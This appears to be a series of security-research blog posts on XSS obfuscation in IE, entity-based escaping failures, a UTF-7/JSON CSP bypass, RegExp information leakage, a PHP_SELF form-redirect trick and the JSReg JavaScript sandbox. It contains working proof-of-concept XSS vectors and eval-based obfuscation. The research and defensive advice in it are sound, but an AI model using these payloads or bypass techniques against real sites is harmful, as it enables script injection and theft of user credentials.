Ping pong obfuscation

This is a fun post about a feature I found in IE that allows you to do some crazy obfuscation. I’ll start off with some simple examples:-

<img src=1 language=vbs onerror=msgbox+1>
<img src=1 language=vbscript onerror=msgbox+1>
<img src=1 onerror=vbs:msgbox+1>

So here we’re not obfuscating but I’m showing how IE accepts the language attribute and a labelled vbs statement to change the event to allow vbscript instead of javascript. Ok so let’s play a little ping pong:-

execScript("MsgBox 1","vbscript"); //executes vbs from js
execScript('execScript "alert(1)","javascript"',"vbscript");

Look how we can call vbscript from javascript by using execScript and then look how we can execute from javascript to vbscript and then back to javascript again! So now we’re playing some ping pong but how can we make our little game hidden?

<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">test</a>

Wait what? Yeah IE supports jscript.encode within the language attribute. Remember jscript.encode? ah the old ones are the best :) That’s it right? Well….

<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>

Yeah you can use VBScript.Encode and JScript.Encode as labels within an event! You might be going WTF right now and I can understand it because I did exactly the same, but it would be silly to stop now without finishing our game of ping pong. How many rallies shall I do? I think 3 should be enough….

<body onload="&#x6a;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x2e;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x65;&#x3a;&#x23;&#x40;&#x7e;&#x5e;&#x54;&#x41;&#x41;&#x41;&#x41;&#x41;&#x3d;&#x3d;&#x6e;&#x58;&#x2b;&#x5e;&#x55;&#x6d;&#x4d;&#x6b;&#x77;&#x44;&#x60;&#x72;&#x3a;&#x40;&#x24;&#x3f;&#x37;&#x33;&#x68;&#x7a;&#x62;&#x29;&#x29;&#x7b;&#x27;&#x5a;&#x25;&#x51;&#x52;&#x47;&#x3d;&#x32;&#x9;&#x56;&#x37;&#x57;&#x42;&#x20;&#x71;&#x64;&#x47;&#x5c;&#x3a;&#x32;&#x6a;&#x62;&#x65;&#x62;&#x7a;&#x29;&#x27;&#x7b;&#x37;&#x3a;&#x3d;&#x40;&#x24;&#x4a;&#x7e;&#x45;&#x25;&#x6b;&#x6d;&#x2e;&#x6b;&#x61;&#x4f;&#x63;&#x2b;&#x55;&#x31;&#x57;&#x39;&#x2b;&#x4a;&#x2a;&#x43;&#x52;&#x63;&#x41;&#x41;&#x41;&#x3d;&#x3d;&#x5e;&#x23;&#x7e;&#x40;">

Ok so I go to:-
jscript->jscript.encode->jscript.encode->jscript.encode->hex entities
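The last step in that chain, the hex entities, is easy to reproduce. Here is a minimal sketch; toHexEntities is just a name I made up for illustration and the encoded payload itself is not regenerated here:

```javascript
// Encode every character of a string as a hexadecimal HTML entity.
// toHexEntities is a hypothetical helper name, not part of IE or any library.
function toHexEntities(text) {
  var out = '';
  for (var i = 0; i < text.length; i++) {
    out += '&#x' + text.charCodeAt(i).toString(16) + ';';
  }
  return out;
}

// The label used in the body onload example above.
console.log(toHexEntities('jscript.encode:'));
```

The output should line up with the start of the onload attribute in the example, since the browser decodes entities before the event code is parsed.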

Twitter misidentifying context

This is an important post for me, not because it’s ground breaking but because people don’t seem to get this when using data in a certain context. If you are a dev please read this and read it until you understand it, because if you misidentify context you fail and you fail pretty badly.

I reported this to twitter about two months ago, they responded and fixed four xss holes but two remain and they didn’t contact me to test the fix.

When you are including user input inside a javascript event within a string what do you have to escape? If you answered: ‘”<>\
You are wrong. Twitter is wrong.

Take the following example:-

<a href=# onclick="x= 'USERINPUT' ">test</a>

So you can place your input within the single quotes and there is a place on twitter that does this:-
twitterTheseResults(' \&quot;\'xss','/search?q=&a…

Here they are escaping &quot; with \&quot; and ‘ with \’. But that isn’t enough! Why? Because it’s a javascript onclick event! Inside an event you have to escape entities! All of them!

Consider the following vector:-
&apos;,alert(1),&apos;

No single quotes but &apos; still acts as one. Please look at this test and make sure you understand how it works:-
http://tinyurl.com/xssyoda

Don’t forget other entities work too &#39; &#x27; &#39 &#x27 so make sure you escape all characters within a js event like so:-

<a href="#" onclick="x='USERINPUT\x27\x22\x3c\x3e'">test</a>

and Twitter PLEASE fix this and related holes c’mon it’s been two months, it’s not rocket science to fix.

&apos; works on non-IE browsers but the other entities mentioned work fine on IE too.
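To make the "escape all characters" advice concrete, here is a rough sketch of an escaper for values that end up inside a quoted string within a js event. The name escapeForJsEvent is my own invention, and I’m assuming the value is only ever placed between the quotes of a string literal like the one above:

```javascript
// Hypothetical helper: prepare a value for a quoted JavaScript string that
// itself sits inside an HTML event attribute.
// Everything except ASCII letters and digits becomes a \xHH or \uHHHH escape,
// so no quote, ampersand, semicolon or angle bracket survives for the HTML
// parser to decode as an entity.
function escapeForJsEvent(input) {
  var out = '';
  for (var i = 0; i < input.length; i++) {
    var ch = input.charAt(i);
    var code = input.charCodeAt(i);
    if (/[A-Za-z0-9]/.test(ch)) {
      out += ch;
    } else if (code < 256) {
      out += '\\x' + ('0' + code.toString(16)).slice(-2);
    } else {
      out += '\\u' + ('000' + code.toString(16)).slice(-4);
    }
  }
  return out;
}

console.log(escapeForJsEvent("&apos;,alert(1),&apos;"));
```

Because the ampersand and semicolon are escaped too, the &apos; vector never reaches the browser as an entity.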

Bypassing CSP for fun, no profit

I had fun at Confidence 2.0 CON, I’m gonna blog about the stuff I was holding back now :)

So I figured out how to bypass CSP with UTF-7 and JSON. Basically any site with a JSON feed that can be manipulated by an attacker (reflective or persistent) can be injected with script, even when the JSON feed is correctly escaped.

Utf-7 can be fully encoded meaning that you can conceal string characters and others. ‘ABC’ becomes +ACcAQQBCAEMAJw-. So if we look at a fictional JSON feed such as:-
[{'friend':'something','email':'something'}]

If we can influence the “something” parts then we inject the feed with our data to bypass CSP:-
[{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJw
BNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdw
BpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAb
wBiACcAOgAnAGQAbwBuAGU-'}]

This is what the code looks like when decoded:-
[{'friend':'luke','email':''}];alert('May the force be with you');[{'job':'done'}]
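If you want to build or check a fully encoded UTF-7 string yourself, something like the following should do. It’s a sketch that assumes Node.js (it leans on the Buffer class), and utf7EncodeAll / utf7DecodeBlock are names I picked for illustration:

```javascript
// Fully encode a string as one UTF-7 shifted block:
// "+" + base64(UTF-16BE bytes, padding removed) + "-".
// Assumes Node.js, whose Buffer class does the UTF-16 and base64 work.
function utf7EncodeAll(text) {
  var utf16be = Buffer.from(text, 'utf16le').swap16();
  return '+' + utf16be.toString('base64').replace(/=+$/, '') + '-';
}

// Reverse of utf7EncodeAll for a single "+...-" block.
function utf7DecodeBlock(block) {
  var base64 = block.replace(/^\+/, '').replace(/-$/, '');
  var bytes = Buffer.from(base64, 'base64');
  return bytes.swap16().toString('utf16le');
}

console.log(utf7EncodeAll("'ABC'"));
console.log(utf7DecodeBlock(utf7EncodeAll("'}];alert(1);[{'job':'done")));
```

Every character goes through the shifted block here, including the quotes and brackets, which is why nothing in the encoded form looks like it needs escaping.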

We then inject the data by referencing it using a script tag and a charset:-

"><script src="http://some.website/test.json" charset="utf-7"></script>

This successfully executes under CSP, bypassing its restrictions, because the code comes from the domain itself and doesn’t use in-line or attribute based XSS.

As always a demo is available here:-
CSP bypass

My RegExp is leaking

I discovered a long time ago that the Javascript specification actually encourages the global RegExp object to retain the properties from the last execution of the regular expression parser. This is quite funny and stupid because as we move forward and sites start to share the same Javascript space we will leak information that we don’t want to leak.

Don’t get me wrong this isn’t a huge issue, it’s just one of those little spec holes which we can exploit for obfuscation or information leakage. NoScript or Firefox (I’m not sure which) seems to leak the last RegExp execution when called from an event. An example of this can be viewed here:-

Regexp leak

So when you click the link, the URL is actually built from NoScript’s scan of the URL using the following code:-

alert(RegExp['$`']+RegExp['$&']+RegExp['$\''])

This could be used for hiding an XSS payload or something, like I said not really that serious…okay onto obfuscation. We can use leftContext etc as a variable to eval and execute code based on the RegExp matches like so:-

/\u0024/.test('\x61\x6c\x65\x72\x74\x28\x31\x29\x24');
eval(RegExp['$`'])

So the pattern finds \$ within the text alert(1)$ and returns the leftContext (RegExp['$`']) which is alert(1) and executes the code.
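To see the leak itself without any eval, here is a small sketch. The function names and the URL are made up, and it assumes an engine that still supports the legacy static RegExp properties (the current mainstream ones do as far as I know):

```javascript
// One piece of code runs a regular expression...
function checkUrl(url) {
  return /secret=(\w+)/.test(url);
}

// ...and unrelated code that runs afterwards can read what it matched.
function readLastMatch() {
  return {
    left: RegExp['$`'],   // text before the match (RegExp.leftContext)
    match: RegExp['$&'],  // the match itself (RegExp.lastMatch)
    right: RegExp["$'"],  // text after the match (RegExp.rightContext)
    group1: RegExp.$1     // first capture group
  };
}

checkUrl('user=bob&secret=hunter2&x=1');
var leaked = readLastMatch();

// Rebuilds the whole scanned string, just like the alert() above.
console.log(leaked.left + leaked.match + leaked.right);
console.log(leaked.group1);
```

Note that readLastMatch never sees the URL as an argument, it only reads the global RegExp object.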

And finally I’ll leave you with some bonus obfuscation:-

eval('a'.replace(/(.+)/,'$1l').replace(/(.+)/,'$1e').replace(/(.+)/,'$1r').replace(/(.+)/,'$1t').replace(/(.+)/,'$1(').replace(/(.+)/,'$11').replace(/(.+)/,'$1)'))
eval('342342ale'.replace(/\d+/,'$`')+'rt23879'.replace(/\d+/,'$\'')+'abcdefggi(1)'.replace(/.+(\([1]\))/,'$+'))

PHP self return of the slash

Not posted for a while because I couldn’t think of anything interesting to say but I thought about something I found ages ago in PHP4 and it’s been long enough now. This is also quite funny because my server is vulnerable to this (that’s what I get for crappy hosting).

So what happens if you escape PHP_SELF with htmlentities($_SERVER['PHP_SELF'], ENT_QUOTES)? Safe from XSS? I hope so. Safe from everything? Well not really, or at least it didn’t use to be. You see PHP does some crazy things with the URL and it’s possible to change a form target to an external URL without using any unsafe characters. Take the following example:-

Login form

This form simulates some web application login and uses PHP_SELF to output the URL because for some reason the developer doesn’t want to type “login.php” or use __FILE__. The URL is escaped from XSS but we can change the form target by simply supplying slashes :) e.g.

Sending Google your password

So the user enters their username and password combination and thinks that they are logging on to the target application, but in reality they are sending the details to an evil site.

I checked PHP5 and it seemed ok but this will serve as a reminder that the slash can get you.
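Why the slashes matter is easier to see from the browser side. The sketch below doesn’t reproduce the PHP4 behaviour, it just assumes the escaped PHP_SELF value ends up starting with two slashes and shows how a form action like that gets resolved. target.example and the paths are made-up values:

```javascript
// Resolve a form action against the page URL the way a browser would.
// target.example and the paths are made-up values for illustration.
var page = 'http://target.example/app/login.php';

var normalAction = '/app/login.php';
// Only "safe" characters, so htmlentities() has nothing to escape here.
var slashedAction = '//www.google.com/login.php';

console.log(new URL(normalAction, page).host);
console.log(new URL(slashedAction, page).host);
```

The second action is a protocol-relative URL, so the form posts to a different host even though nothing in it looks dangerous.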

Javascript compression with unicode characters

For some random reason I was making a base999 number compression function, I think it was because someone posted on sla.ckers about base 62. I wanted to see how far I could compress the numbers using a higher range of characters, then it hit me. Why not use it for js compression :)

You see if you convert the characters to their character code number and then extract a section of the number and convert it to a unicode character you can drastically reduce the amount of characters, provided of course your code contains enough characters as a decompression function is required.

I’ve added the three tag to Hackvertor to demo the compression. Here is a sample of code:-

eval("◮ᾥѵ٨ፍ".replace(/[^\s]/g,function(c){return c.charCodeAt()}).replace(/[3][2-9]|[4-9][0-9]|[1][0-1][0-9]|[1][2][0-6]/g,function(d){return String.fromCharCode(d)}))

The unpacking function simply gets the character codes, then the very specific regexp finds a range of characters from !-~ based on the character code number. This is because I only have one long number and they are not separated. I leave spaces intact because they don’t fall between the ranges and also it can break syntax if they are missing a semi-colon. It’s possible to reduce it further by including these characters.
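Only the unpacking side is shown above, so here is a rough sketch of what a matching packer could look like. This is my reconstruction for illustration, not the actual Hackvertor tag: it assumes printable ASCII input, cuts the long number into chunks of up to four digits, and avoids chunks that would lose a leading zero or turn into a whitespace character:

```javascript
// Unpacker: the same two replace() steps as the sample above, minus the eval.
function unpack(packed) {
  return packed
    .replace(/[^\s]/g, function (c) { return c.charCodeAt(0); })
    .replace(/[3][2-9]|[4-9][0-9]|[1][0-1][0-9]|[1][2][0-6]/g, function (d) {
      return String.fromCharCode(d);
    });
}

// Packer sketch (an assumption, not the original tag's code).
function pack(code) {
  // Whitespace is left intact, so each non-whitespace run is packed on its own.
  return code.replace(/[^\s]+/g, function (run) {
    var digits = '';
    for (var i = 0; i < run.length; i++) {
      var n = run.charCodeAt(i);
      if (n < 33 || n > 126) throw new Error('only printable ASCII is supported');
      digits += n;
    }
    var out = '';
    var pos = 0;
    while (pos < digits.length) {
      var taken = 0;
      for (var len = 4; len >= 1; len--) {
        var chunk = digits.slice(pos, pos + len);
        var next = digits.charAt(pos + chunk.length);
        var ch = String.fromCharCode(Number(chunk));
        // The next chunk must not start with 0 (the zero would be lost) and
        // the packed character must not be whitespace (it would not unpack).
        if (next !== '0' && !/\s/.test(ch)) {
          out += ch;
          taken = chunk.length;
          break;
        }
      }
      if (!taken) throw new Error('no valid chunk at digit ' + pos);
      pos += taken;
    }
    return out;
  });
}

console.log(unpack(pack('alert(1)')));
```

The packer can still give up on awkward digit sequences, so treat it as a starting point for the "smaller decompression function" challenge rather than a finished tool.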

So if you want to have some fun, try reducing the amount of characters compressed and see if you can create a smaller decompression function. Below is an example of the jspack tag in action:-
JS pack

Update…

Ok as Andrea pointed out this isn’t actual compression, however many systems including twitter think the unicode characters are actually only 1 byte, which results in a longer message. So you can compress a 280 character message into 140. Sirdarckcat managed to get it down to the 50% ratio, you can send encoded twitter messages with Hackvertor. Like this:-

Encoded twitter message

Fresh prototypes on all browsers

So there’s a well known technique for getting Object prototypes that are not from the current window which results in a fresh prototype. You use iframes to copy the required prototype from the iframe.contentWindow BUT…It doesn’t work in all browsers and it’s pretty silly having to copy each object manually, why not just use the window? Well you can :D

So after a lot of code testing/rewriting here is how to do it:-

var iframe = document.createElement('iframe');
iframe.style.width = '1px';
iframe.style.height = '1px';
iframe.frameBorder = "0";
iframe.style.position = 'absolute';
iframe.style.left = '-100px';
iframe.style.top = '-100px';
document.body.appendChild(iframe);
var code = "(function(objConstructor){ return window.NameOfInstance= objConstructor();})(" + objConstructor+ ")";
if (window.opera) {
	iframe.contentWindow.Function(code)();
} else {
	iframe.contentWindow.document.write('<\script type="text/javascript">' + code + '<\/script>');
	iframe.contentWindow.document.close();
}
var obj = iframe.contentWindow.NameOfInstance;
if(!obj) {
	iframe.contentWindow.Function(code)();
	obj = iframe.contentWindow.NameOfInstance;
}

So here obj contains our Object instance within the context of the iframe window, that means any references to window inside your object only affect the iframe context. The reason for the if statements and different code is because Firefox, Safari, Opera and IE all act differently. Opera doesn’t pass the object straight away unless the Function constructor is used, Safari supports the Function constructor method and the document.write method but doesn’t return the object correctly when using document.write until it’s loaded.

The important part about this code is that you don’t need to use the onload event of the iframe as the object is returned instantly :)

Creating HTML listeners with JSReg and Hackvertor

JSReg has grown up a bit since I released the first version. You can now use it to monitor malicious javascript. I have a very basic example of this in Hackvertor, at the moment Hackvertor doesn’t support callbacks so it’s a bit of a hack but you will get the idea.

I use __defineSetter__ to monitor the fake document object, you see in JSReg the document object doesn’t exist it becomes $document$ but you can supply your own object in order to create a listener. At the moment the code only works on Firefox, see below for the example:-

var parser = JSReg();
var result;
parser.setDebugObjects({result: function(code){
	result = code;
}});
var html = '';
if (window.__defineSetter__) {
	var htmlLog = function(str) {
		html += str;
	}
	var obj = {
		$write$:htmlLog,
		$body$:htmlLog
	}
	obj.$body$.__defineSetter__('$innerHTML$',htmlLog);
	obj.__defineSetter__('$innerHTML$',htmlLog);
	parser.setDocument(obj);
}
try {
	parser.runCheck();
	parser.eval(code);
}
catch (e) {
	alert(e.description||e);
}
alert('Decoding javascript...');
if(html != '') {
	result += '\nHTML:'+html;
}
return result;

So “obj” is our fake document object, I just add the properties write and body. Then I use __defineSetter__ to monitor any assignments to innerHTML. You could monitor more of course and even extend the window object to monitor eval. So how does this work in practice? Well take a look below with some fake encoded malicious javascript:-

Encoded fake javascript malware

As you can see JSReg executes the javascript safely and then uses the fake document to monitor document.write which presents you with the HTML output. This is only a basic example of how it could be used, in future I plan to allow Hackvertor to provide more detailed examination of malicious javascript.
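If you want to play with the listener idea outside of JSReg, here is a stand-alone sketch. It swaps __defineSetter__ for the standard Object.defineProperty so it runs in more places, and fakeDocument, fakeBody and htmlLog are just illustrative names:

```javascript
// Stand-alone sketch of the listener idea, without JSReg.
// Object.defineProperty is used here in place of __defineSetter__.
var html = '';
function htmlLog(str) {
  html += str;
}

// Fake body: any assignment to innerHTML is logged instead of rendered.
var fakeBody = {};
Object.defineProperty(fakeBody, 'innerHTML', { set: htmlLog });

// Fake document: write() is logged too.
var fakeDocument = { write: htmlLog, body: fakeBody };

// The code under inspection only ever sees the fake object.
(function (document) {
  document.write('<b>one</b>');
  document.body.innerHTML = '<i>two</i>';
})(fakeDocument);

console.log(html);
```

Nothing touches a real DOM here, the HTML the script tried to produce just ends up in the log string.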

JSReg update

Big thanks!

I’ve done lots of updates to JSReg with some fantastic help from kangax, sirdarckcat, Thornmaker and mario.

Mario found some cool parsing bugs, sirdarckcat helped with some exploits that assigned to window :) and also provided some awesome code ideas and bugs. Thornmaker found ternaries cause problems with my object detection. I’d also like to thank Achim who helped me find a recursive regexp when he tested it on other browsers. Finally kangax’s input has been great, providing me with some headaches trying to match RegExps that look like comments and many other parsing bugs. Thanks a lot guys! You’ve been awesome!

A lot has changed since my last post, it’s getting closer and closer to being used in real world applications and my new version of Hackvertor :) I didn’t expect to be able to parse as much code as it currently does and manage to keep the RegExps small. I try to match as little as possible as Javascript is a complex language.

How it works

In case you don’t know, JSReg is a Javascript sandbox with a difference. It uses Javascript itself to safely parse the code using regular expressions. This means that some features are removed from the Javascript language while in the sandbox, examples of these are access to the DOM like document.body etc. and Object methods like valueOf and toString. The goal is to produce safe Javascript from an untrusted source.

To see how it works check the following example:-

a='a';eval(\u0061+'\x6c\x65\x72\x74\x28\u0034\x32\u0029');

The code assigns the letter “a” to a variable of “a”. Then the eval function is used with a unicode escape which translates to the variable “a” then it’s concatenated with various escapes to produce alert(42).
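If the escapes are hard to follow, this little snippet does the same concatenation without the eval so you can see the string that would be executed:

```javascript
var a = 'a';

// \u0061 written as an identifier is just another spelling of the variable a.
var decoded = \u0061 + '\x6c\x65\x72\x74\x28\u0034\x32\u0029';

console.log(decoded);
```

The unicode escape is resolved as an identifier while the \x and \u escapes inside the quotes are resolved as string characters, which is exactly the kind of thing a rewriter has to cope with.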

Here is the JSReg’d version:-

var $a$,$eval$;
$a$=globals.string('a');$eval$($a$+globals.string('\x6c\x65\x72\x74\x28\u0034\x32\u0029'));

So the rewriter identifies dangerous strings and converts them into safe strings. In this instance eval is renamed $eval$ which is a custom JSReg function that translates the content sent to it. All variables used are declared at the top which prevents them being assigned to the global window space. globals.string etc are a special JSReg object which defines a new prototyped version of String etc. to allow you to call whitelisted methods of the object.
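To give a feel for the renaming idea, here is a toy rewriter. It is definitely not JSReg’s real code: toyRewrite and the RESERVED list are made up for this sketch, and it ignores comments, regex literals and most of the language. It only wraps string literals, renames identifiers and declares them at the top:

```javascript
// Toy rewriter, NOT JSReg's real code: it only shows the renaming idea.
var RESERVED = ['var', 'function', 'return', 'if', 'else', 'for', 'while',
                'new', 'this', 'typeof', 'true', 'false', 'null'];

function toyRewrite(source) {
  var declared = [];
  // Tokens: single-quoted string | double-quoted string | number | identifier
  var token = /'(?:\\.|[^'\\])*'|"(?:\\.|[^"\\])*"|\d[\w.]*|(?:[A-Za-z_$]|\\u[0-9a-fA-F]{4})(?:[\w$]|\\u[0-9a-fA-F]{4})*/g;
  var body = source.replace(token, function (tok) {
    var first = tok.charAt(0);
    if (first === "'" || first === '"') {
      return 'globals.string(' + tok + ')'; // wrap string literals
    }
    if (/\d/.test(first)) {
      return tok; // leave numbers alone
    }
    // Decode \uXXXX escapes so that \u0061 and a become the same name.
    var name = tok.replace(/\\u([0-9a-fA-F]{4})/g, function (m, hex) {
      return String.fromCharCode(parseInt(hex, 16));
    });
    if (RESERVED.indexOf(name) !== -1) {
      return name;
    }
    if (declared.indexOf(name) === -1) {
      declared.push(name);
    }
    return '$' + name + '$';
  });
  var header = declared.map(function (n) { return '$' + n + '$'; }).join(',');
  return (header ? 'var ' + header + ';\n' : '') + body;
}

console.log(toyRewrite(String.raw`a='a';eval(\u0061+'\x6c\x65\x72\x74\x28\u0034\x32\u0029');`));
```

For the example input it produces output shaped like the JSReg’d version above, but the real thing has to deal with far more syntax than this handful of tokens.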

Interface

That’s the basic idea of how JSReg works. The interface contains six textareas which show the result of the JSReg evaluation. The first box is your code input and the second is the JSReg conversion of your input. globals.eval contains the result of an eval operation and the code which has been rewritten, and globals.function contains similar output to eval but with Function code when calling new Function. The result box returns the evaluated result after the code has been converted, and the globals box at the bottom lists any global variables that might have escaped the sandbox.

Future and development

I always thought it was possible to use untrusted Javascript within Javascript itself, many other solutions had other languages as a requirement. I think JSReg is definitely getting there now after many failed attempts. I plan to integrate sirdarckcat’s HTML parser too in future, to allow safe access to the DOM. Best of all I’m giving away this code, you can use it freely on your web site :) So please get involved! Find an exploit or a parsing error and help produce a native Javascript sandbox which is free for everybody to use.

Try out JSReg

Hidden Firefox properties revisited

This is the first time I’ve looked at the Firefox source, really! :) I wanted to find all the hidden properties Firefox has in Javascript. It was first pointed out to me by DoctorDan on the sla.ckers forums when he found that the RegExp literal had a -1 value for the source in Firefox 2. I then made it my mission to find others because I thought it would be cool.

They seem to be flags within the source (Ronald mentioned this to me at some point too), I’m not sure how they are used internally or within Javascript. In the source code they are given the name tinyid so that’s what I’ll refer to them from now on.

Here’s how to use them:-

(function(){ alert(arguments[-3]) })()

Functions:-
CALL_ARGUMENTS = -1, predefined arguments local variable
ARGS_LENGTH = -2, number of actual args, arity if inactive
ARGS_CALLEE = -3, reference from arguments to active funobj
FUN_ARITY = -4, number of formal parameters; desired argc
FUN_NAME = -5, function name, “” if anonymous
FUN_CALLER = -6 Function.prototype.caller, backward compat

RegExp:-
REGEXP_STATIC_INPUT = -1,
REGEXP_STATIC_MULTILINE = -2,
REGEXP_STATIC_LAST_MATCH = -3,
REGEXP_STATIC_LAST_PAREN = -4,
REGEXP_STATIC_LEFT_CONTEXT = -5,
REGEXP_STATIC_RIGHT_CONTEXT = -6

REGEXP_SOURCE = -1,
REGEXP_GLOBAL = -2,
REGEXP_IGNORE_CASE = -3,
REGEXP_LAST_INDEX = -4,
REGEXP_MULTILINE = -5,
REGEXP_STICKY = -6;

E4X:-
NAMESPACE_PREFIX = -1,
NAMESPACE_URI = -2

QNAME:-
QNAME_URI = -1,
QNAME_LOCALNAME = -2

As I find more I’ll add them here, I know strings uses -1 for the length but I’ll wait till I find all of them for the string object.